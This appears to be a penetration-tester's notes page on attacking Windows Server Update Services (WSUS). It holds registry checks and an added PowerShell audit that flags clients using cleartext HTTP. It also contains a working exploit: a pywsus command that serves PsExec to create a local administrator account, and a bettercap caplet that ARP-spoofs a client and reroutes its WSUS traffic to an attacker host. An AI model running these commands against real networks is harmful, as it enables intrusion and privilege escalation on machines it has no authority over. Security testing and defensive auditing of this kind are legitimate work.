# WSUS

* <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus>

## HTTP MitM

* <https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update.pdf>
* <https://github.com/GoSecure/pywsus>
* <https://www.gosecure.net/blog/2020/09/03/wsus-attacks-part-1-introducing-pywsus/>
* <https://www.thehacker.recipes/systems-and-services/privilege-escalation/windows/wsus-attacks>
* <https://github.com/NeffIsBack/wsuks>

Check:

```
PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
    WUServer    REG_SZ    http://wsus.megacorp.local:8530

PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
    UseWUServer    REG_DWORD    0x1
```

A `WUServer` value with an `http://` scheme (the default WSUS port 8530 is HTTP; 8531 is HTTPS) together with `UseWUServer = 1` is the precondition for the MitM below: the client fetches update metadata and binaries over cleartext, so anyone who can redirect its traffic to the WSUS hostname can answer in the server's place.
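An added defender-side audit, not part of the original notes: this PowerShell reads the same two policy values as the `reg query` commands above and flags a client whose `WUServer` uses plain `http://`. The registry paths are the documented WSUS client policy keys; the reporting wording and the `Test-WsusClientConfig` function name are my own.

```powershell
# Added example (not from the original page): report whether this host is a WSUS
# client and whether its update channel is cleartext HTTP or HTTPS.
function Test-WsusClientConfig {
    $wuPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
    $auPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU'

    # Both reads tolerate a missing key/value (host not managed by WSUS policy).
    $wuServer    = (Get-ItemProperty -Path $wuPath -Name WUServer    -ErrorAction SilentlyContinue).WUServer
    $useWuServer = (Get-ItemProperty -Path $auPath -Name UseWUServer -ErrorAction SilentlyContinue).UseWUServer

    if (-not $wuServer -or $useWuServer -ne 1) {
        return [pscustomobject]@{
            Managed  = $false
            Server   = $wuServer
            Scheme   = $null
            Finding  = 'No WSUS server enforced by policy; client uses Microsoft Update (HTTPS).'
        }
    }

    # Parse the configured URL without throwing on a malformed value.
    $uri = $null
    if (-not [System.Uri]::TryCreate($wuServer, [System.UriKind]::Absolute, [ref]$uri)) {
        return [pscustomobject]@{
            Managed = $true; Server = $wuServer; Scheme = $null
            Finding = 'WUServer is not a valid absolute URL; the client cannot contact WSUS safely.'
        }
    }

    $finding = switch ($uri.Scheme) {
        'http'  { 'WSUS over cleartext HTTP: update traffic can be intercepted on the path to the server. Enable SSL on the WSUS role and point WUServer (and WUStatusServer) at the https:// URL.' }
        'https' { 'WSUS over HTTPS: update metadata and binaries are protected in transit.' }
        default { "Unexpected URL scheme '$($uri.Scheme)' in WUServer." }
    }

    [pscustomobject]@{
        Managed = $true
        Server  = $wuServer
        Scheme  = $uri.Scheme
        Finding = $finding
    }
}

# Usage: run on a domain-joined workstation; a Scheme of 'http' is the condition to fix.
Test-WsusClientConfig | Format-List
```

Running this across a fleet (for example through a scheduled job that writes the object to a central log) gives a simple inventory of which clients are still on the HTTP channel, which is the population the MitM below can target.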

Exploit:

```
$ python3 pywsus.py --host $ATTACKER_IP --port 8530 --executable /home/snovvcrash/www/PsExec64.exe --command '/accepteula /s cmd.exe /c "net user testuser Passw0rd! /add && net localgroup Administrators testuser /add"'
$ sudo ./bettercap --iface $INTERFACE --caplet wsus.cap
```

{% code title="wsus.cap" %}

```bash
# Quick recon of the network
net.probe on

# Configure ARP spoofing against the target client
set arp.spoof.targets $CLIENT_IP
set arp.spoof.internal false
set arp.spoof.fullduplex false

# Re-route traffic aimed at the WSUS server
set any.proxy.iface $INTERFACE
set any.proxy.protocol TCP
set any.proxy.src_address $WSUS_SERVER_IP
set any.proxy.src_port 8530
set any.proxy.dst_address $ATTACKER_IP
set any.proxy.dst_port 8530

# Control logging and verbosity
events.ignore endpoint
events.ignore net.sniff

# Start the modules
any.proxy on
arp.spoof on
net.sniff on
```

{% endcode %}

## Local Proxy (LPE)

* <https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/>

## WSUS + LDAPS NTLM Relay

* <https://www.gosecure.net/blog/2021/11/22/gosecure-investigates-abusing-windows-server-update-services-wsus-to-enable-ntlm-relaying-attacks/>

## Tools

### SharpWSUS

* <https://labs.nettitude.com/blog/introducing-sharpwsus/>
* <https://github.com/nettitude/SharpWSUS>
